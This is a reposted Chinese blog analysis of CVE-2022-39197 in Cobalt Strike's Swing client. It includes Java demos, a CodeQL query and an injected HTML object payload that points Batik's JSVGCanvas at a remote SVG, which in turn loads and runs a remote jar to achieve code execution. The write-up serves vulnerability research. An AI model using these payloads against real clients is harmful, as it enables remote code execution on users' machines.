CVE-2022-39197 分析
2023-4-26 12:1:12 Author: 白帽子左一(查看原文) 阅读量:20 收藏

扫码领资料

获网安教程

免费&进群

之前9月份的时候,忘记写了。现在重新写一份记录一下整个过程。利用过程的查找真的是废了眼睛

CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍,<=4.7的teamserver版本存在XSS漏洞

一、swing漏洞

CobaltStrike 使用的组件为swing  那么首先了解一下他是怎么解析使用html 

https://docs.oracle.com/javase/tutorial/uiswing/components/html.html

解析HTMl Demo

import javax.swing.*;
import java.awt.*;

public class demo {
/**{
* 创建并显示GUI。出于线程安全的考虑,
* 这个方法在事件调用线程中调用。
*/
private static void createAndShowGUI() {
// 确保一个漂亮的外观风格
JFrame.setDefaultLookAndFeelDecorated(true);
// 创建及设置窗口
JFrame frame = new JFrame("HelloWorldSwing");
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setPreferredSize(new Dimension(800, 600));
// 添加 "Hello World" 标签
JLabel label = new JLabel("<html><h1>66666</h1></html>");
frame.getContentPane().add(label);
// 显示窗口
frame.pack();
frame.setVisible(true);
}
public static void main(String[] args) {
// 显示应用 GUI
javax.swing.SwingUtilities.invokeLater(new Runnable() {
public void run() {
createAndShowGUI();
}
});
}
}

追踪一下解析html 的过程 发现最终会调用到javax.swing.text.html.HTML.java  

会循环调用 每个TAG 标签。执行完之后会经过javax/swing/text/html/HTMLDocument.HTMLReader 进行一个初始化

每个标签都有一个初始化函数例如:

例如A标签

这里大概明白了 他的一个整体的逻辑了。就是每个TAG 都有一个或者公用的一个类。

然后进入到javax/swing/text/html/HTMLEditorKit.create 函数中

在HTMLEditorKit里的create方法可以看到不同的标签会对应到创建不同的view

那么顺序是Read –> create –>new xx 视图。例如H6标签。如下

其中发现一个有意思的标签javax/swing/text/html/ObjectView

例子如下:

        <object classid="javax.swing.JLabel">
<param name="text" value="sample text">
</object>

代码如下:

  /**
* Create the component. The classid is used
* as a specification of the classname, which
* we try to load.
*/
protected Component createComponent() {
AttributeSet attr = getElement().getAttributes();
String classname = (String) attr.getAttribute(HTML.Attribute.CLASSID);
try {
ReflectUtil.checkPackageAccess(classname);
Class c = Class.forName(classname, true,Thread.currentThread().
getContextClassLoader());
Object o = c.newInstance();
if (o instanceof Component) {
Component comp = (Component) o;
setParameters(comp, attr);
return comp;
}
} catch (Throwable e) {
// couldn't create a component... fall through to the
// couldn't load representation.
}

return getUnloadableRepresentation();
}

首先获取了classid  字符串名称。然后直接获取了这个类的对象。然后进行实例化这个类。。但是这个有一个条件,就是为 Component  类或者是他的子类

那么看看。对应的key VALUE 的设置

那么总结一下这个object 的利用的条件

classid传入需要实例化的类,类必须继承与Component
必须有无参构造方法,貌似是因为newinstant是调用的无参构造方法
必须存在一个setXXX方法的XXX属性
setXXX方法的传参数必须是接受一个string类型的参数

那么根据如上的要求。写了一个Demo

import java.awt.Dimension;
import javax.swing.*;
public class demo {
private static void createAndShowGUI() {

// 确保一个漂亮的外观风格
JFrame.setDefaultLookAndFeelDecorated(true);
// 创建及设置窗口
JFrame frame = new JFrame("HelloWorldSwing");
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setPreferredSize(new Dimension(800, 600));
// 添加 "Hello World" 标签
String payload = "<html><object classid='javax.swing.JLabel'><param name='text' value='test'></object>";
System.out.println(payload);
JLabel label = new JLabel(payload);

frame.getContentPane().add(label);

// 显示窗口
frame.pack();
frame.setVisible(true);
}

public static void main(String[] args) {
// 显示应用 GUI
javax.swing.SwingUtilities.invokeLater(new Runnable() {
public void run() {
createAndShowGUI();
}
});
}

}

JLabel 继承链--> JComponent -->Container  -->Component

public class JLabel extends JComponent implements SwingConstants, Accessible 

这里是引用了。javax.swing.JLabel.setText 函数

二、CobaltStrike 代码类的寻找

首先我们先导入任意一个版本的CS jar包到当前项目中

通过Navigate —–> Type Hierarchy  查询所有的子类


还可以使用codeql 进行查询

class SetMethod extends Method{
SetMethod(){
this.getDeclaringType().getASupertype*().hasQualifiedName("java.awt", "Component") and
this.getName().indexOf("set") = 0 and
this.getName().length() > 3 and
this.isPublic() and
this.fromSource() and
this.getNumberOfParameters() = 1
and this.getAParamType().getName() = "String"
and this.getTotalNumberOfLines() > 3
and this.getDeclaringType().getAConstructor().isPublic()
and this.getDeclaringType().getAConstructor().hasNoParameters()
}
}

from SetMethod setMethod
select setMethod, setMethod.getDeclaringType().getPackage().getName()+"."+setMethod.getDeclaringType()

大概找了好几个小时之后。就发现了这个类比较符合条件的

org.apache.batik.swing.JSVGCanvas.setURI()

    public void setURI(String var1) {
String var2 = this.uri;
this.uri = var1;
if (this.uri != null) {
this.loadSVGDocument(this.uri);
} else {
this.setSVGDocument((SVGDocument)null);
}

this.pcs.firePropertyChange("URI", var2, this.uri);
}

那么试试这个是否可以访问某个URl

import javax.swing.*;
import java.awt.*;

import javax.swing.JLabel;
public class demo {
/**{
* 创建并显示GUI。出于线程安全的考虑,
* 这个方法在事件调用线程中调用。
*/
private static void createAndShowGUI() {
// 确保一个漂亮的外观风格
JFrame.setDefaultLookAndFeelDecorated(true);
// 创建及设置窗口
JFrame frame = new JFrame("HelloWorldSwing");
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
frame.setPreferredSize(new Dimension(800, 600));
// 添加 "Hello World" 标签
JLabel label = new JLabel("<html><object classid='org.apache.batik.swing.JSVGCanvas'><param name='URI' value='http://192.168.1.72/1.txt'></object>\n");
frame.getContentPane().add(label);
// 显示窗口
frame.pack();
frame.setVisible(true);
}
public static void main(String[] args) {
// 显示应用 GUI
javax.swing.SwingUtilities.invokeLater(new Runnable() {
public void run() {
createAndShowGUI();
}
});
}
}

发现是可以访问到的。那么有一个url 访问能有啥用呢?

尝试翻翻官方文档

https://xmlgraphics.apache.org/batik/using/scripting/ecmascript.html

发现竟然可以调用import 

尝试一下

<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<script>
Runtime.getRuntime().exec('calc');
</script>
</svg>

发现并不可行。继续看看官方文档。

https://xmlgraphics.apache.org/batik/using/scripting/java.html

发现还可以 application/java-archive 这种类型的加载

查找了一下Demo

https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

远程svg 文件

<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100" xmlns:xlink="http://www.w3.org/1999/xlink">
<script type="application/java-archive" xlink:href="http://127.0.0.1/6445.jar">
</script>
</svg>

制作一个利用的jar包

MANIFEST.MF 制定好你写的类

Manifest-Version: 1.0
Main-Class: mains
SVG-Handler-Class: export.Demo

然后使用IDEA 的打包成jar 即可

然后执行一下  成功完成RCE

二、修复建议:

目前官方已发布安全版本修复上述漏洞,建议受影响的用户升级至安全版本。

参考链接:https://www.cobaltstrike.com/blog/out-of-band-update-cobalt-strike-4-7-1/

参考:

https://mp.weixin.qq.com/s/l5e2p_WtYSCYYhYE0lzRdQ

https://mp.weixin.qq.com/s/fZtDvpyAo-UZRE9MhfB0VQ

来源:https://www.o2oxy.cn/4157.html

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理,拥有自己的代理池

漏洞挖掘|密码找回中的套路

渗透测试岗位面试题(重点:渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货|列了几种均能过安全狗的方法!

一名大学生的黑客成长史到入狱的自述

攻防演练|红队手段之将蓝队逼到关站!

巧用FOFA挖到你的第一个漏洞

看到这里了,点个“赞”、“再看”吧

文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247594225&idx=1&sn=00c215cf1c1258f557b4bb897ffe0034&chksm=ebeb39dcdc9cb0cae870ea093d5999550c9dda9030774b61261256cfc23e41f15b3df57c3bf7#rd
如有侵权请联系:admin#unsafe.sh